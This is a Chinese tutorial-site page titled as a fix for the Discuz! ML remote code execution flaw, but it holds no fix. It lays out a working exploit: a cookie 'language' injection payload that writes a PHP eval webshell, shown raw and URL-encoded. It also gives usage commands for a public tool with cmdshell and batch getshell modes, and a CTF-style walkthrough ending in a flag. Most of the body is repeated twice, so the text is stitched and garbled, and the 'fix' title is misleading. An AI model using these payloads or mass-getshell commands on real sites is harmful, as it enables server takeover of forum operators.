您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz ML RCE漏洞修复
海安2025-07-05Discuz教程已有人查阅
导读Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
1、漏洞描述
Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。
2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
3、影响版本:
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.4
4、利用exp,进行上传一句话木马
1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
2.抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().'
3.getshell 的payload: ’.file_put_contents(‘shell.php’,urldecode(’<?php eval($_POST["cmd"]);?>’)).',url编码后的形式是
5、利用dz-ml-rce.py工具进行分析。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
6、如何下载dz-ml-rce.py工具
在python2.7的环境中安装,安装命令如下:
使用时加上漏洞PHP页面(如forum.php,portal.php),直接写域名可能会重定向导致误报。
使用帮助:python dz-ml-rce.py -h
判断模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php"
cmdshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --cmdshell
getshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --getshell
批量检测:python dz-ml-rce.py -f urls.txt
批量getshell:python dz-ml-rce.py -f urls.txt --getshell
8、实战分析:
当我们进入这个网址后,可以发现它的cms类型是Discuz! X3.2,这是一个比较老的版本,我们可以去乌云,0组查看相关思路文章,发现比较少
于是我们去百度中搜索这个Discuz! X3.2的漏洞可以get shell,所以这道题目考察的一定是cms的漏洞
而我们去网上查的话,有很多的漏洞,比如构建的请求报文,请求报文中含有恶意的PHP代码,任意删除文件,代码注入漏洞等多种漏洞
本网站我所利用的是构建的请求报文,请求报文中含有恶意的PHP代码这一漏洞,也就是Discuz ML RCE漏洞,后面又一篇文章专门写此漏洞
所以我们可以知道它存在cms漏洞:Discuz! X3.2 漏洞 中的 构建的请求报文(恶意的PHP代码,一句话木马)漏洞
所以这个题我们可以考虑使用bur抓包改包,上传一句话木马,get shell
我们对bur进行抓包:
抓包后我们可以发现在cookie字段中有xxxx_xxxx_language字段,所以我们对其进行改包
先看phpinfo文件,看是否存在相关漏洞(验证)
发现存在相关漏洞,所以我们直接上传一句话木马,构造的形式如下:
我们使用蚁剑进行连接
连接成功:
最终我们就可以发现flag的文件,也就是此题的答案flag就在其中,打开之后就是答案,也就是flag,flag{49c883689da71363809d64b8b48679ba}此题完成
Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。
2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
3、影响版本:
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.4
4、利用exp,进行上传一句话木马
1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
2.抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().'
3.getshell 的payload: ’.file_put_contents(‘shell.php’,urldecode(’<?php eval($_POST["cmd"]);?>’)).',url编码后的形式是
%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27
所以我们可以考虑使用bur抓包改包,上传一句话木马,get shell5、利用dz-ml-rce.py工具进行分析。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
6、如何下载dz-ml-rce.py工具
在python2.7的环境中安装,安装命令如下:
git clone https://github.com/theLSA/discuz-ml-rce.git
pip -r requirements.txt
7、如何使用dz-ml-rce.py工具使用时加上漏洞PHP页面(如forum.php,portal.php),直接写域名可能会重定向导致误报。
使用帮助:python dz-ml-rce.py -h
判断模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php"
cmdshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --cmdshell
getshell模式:python dz-ml-rce.py -u "http:// .xxx.cn/forum.php" --getshell
批量检测:python dz-ml-rce.py -f urls.txt
批量getshell:python dz-ml-rce.py -f urls.txt --getshell
8、实战分析:
当我们进入这个网址后,可以发现它的cms类型是Discuz! X3.2,这是一个比较老的版本,我们可以去乌云,0组查看相关思路文章,发现比较少
于是我们去百度中搜索这个Discuz! X3.2的漏洞可以get shell,所以这道题目考察的一定是cms的漏洞
而我们去网上查的话,有很多的漏洞,比如构建的请求报文,请求报文中含有恶意的PHP代码,任意删除文件,代码注入漏洞等多种漏洞
本网站我所利用的是构建的请求报文,请求报文中含有恶意的PHP代码这一漏洞,也就是Discuz ML RCE漏洞,后面又一篇文章专门写此漏洞
所以我们可以知道它存在cms漏洞:Discuz! X3.2 漏洞 中的 构建的请求报文(恶意的PHP代码,一句话木马)漏洞
所以这个题我们可以考虑使用bur抓包改包,上传一句话木马,get shell
我们对bur进行抓包:
抓包后我们可以发现在cookie字段中有xxxx_xxxx_language字段,所以我们对其进行改包
先看phpinfo文件,看是否存在相关漏洞(验证)
发现存在相关漏洞,所以我们直接上传一句话木马,构造的形式如下:
%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27
我们直接在网页上查看shell.php文件,看是否可以正常显示我们使用蚁剑进行连接
连接成功:
最终我们就可以发现flag的文件,也就是此题的答案flag就在其中,打开之后就是答案,也就是flag,flag{49c883689da71363809d64b8b48679ba}此题完成
本文标签:
很赞哦! ()
上一篇:Discuz!道具系统开发介绍
下一篇:Discuz! X 插件开发教程
相关教程
图文教程
Discuz论坛勋章系统的使用方法
在Discuz论坛中,勋章系统是一个非常有趣且有吸引力的功能,让我们来聊聊如何获取和展示这些勋章吧。 Discuz的勋章系统不仅增强了论坛的互动性,还能激励用户积极参与社区活动。
Discuz移动端适配常见问题与解决方案
移动端适配对于Discuz论坛来说是一个关键的优化点。用户在移动设备上浏览论坛的体验直接影响到用户的留存率和活跃度。那么,如何解决Discuz移动端适配的常见问题呢?
discuz x3.1论坛搬家换域名的方法
请关闭论坛,尤其是数据备份和还原时请不要操作论坛。进入后台→站长→数据库→备份,备份成功以后,数据保存在 data/backup_**。
Discuz!NT在64位Windows下运行常见问题
非常搞,等了快一年Discuz!NT的免费版本依旧不支持64位Windows。官方出了64位windows支持的指南居然是叫用户把IIS设置为32位兼容模式。说了等于没说
相关源码
-
(自适应)工商代理公司注册财务会计pbootcms模板免费下载为工商代理、财务会计服务企业设计的网站模板,基于PbootCMS开发,充分考虑了企业服务行业的展示需求与客户转化路径。设计风格专业严谨,布局清晰合理,呈现企业服务内容与专业优势。查看源码 -
(自适应响应式)蓝色外贸英文产品介绍展示网站模板本模板采用手工编写的DIV+CSS架构,代码精简高效。适配手机端浏览,数据实时同步更新。内置SEO优化框架,支持独立设置各页面标题、关键词及描述。开源代码结构清晰,便于二次开发。查看源码 -
(自适应)品牌策划高端设计公司网站pbootcms模板免费下载本模板为品牌策划与设计公司打造,基于PbootCMS内核开发,充分考虑了创意设计行业的视觉展示需求。模板设计风格现代简约,布局合理清晰,呈现设计作品与专业服务,帮助设计公司展示创意实力并吸引潜在客户。查看源码 -
(自适应响应式)供应链进出口服务pbootcms企业网站源码为供应链管理、进出口服务类企业设计,特别适合展示物流网络、贸易服务和供应链解决方案。采用响应式技术,确保在各类设备上都能呈现企业服务内容。查看源码 -
(PC+WAP)蓝色新能源环保太阳能光伏模板pbootcms下载新能源环保行业网站解决方案为太阳能光伏系统企业打造的专业网站模板,助力新能源企业高效展示产品与服务PbootCMS内核开发,源码开放可修改PC与手机端自适应设计查看源码 -
(自适应)WordPress二次元博客主题SakurairoSakurairo主题为二次元内容创作者设计,提供丰富的动漫风格元素和个性化的展示效果。该主题在原有Sakura主题基础上进行了功能增强,支持多种自定义设置,满足动漫爱好者建立个人博客的需求。查看源码
| 分享笔记 (共有 篇笔记) |
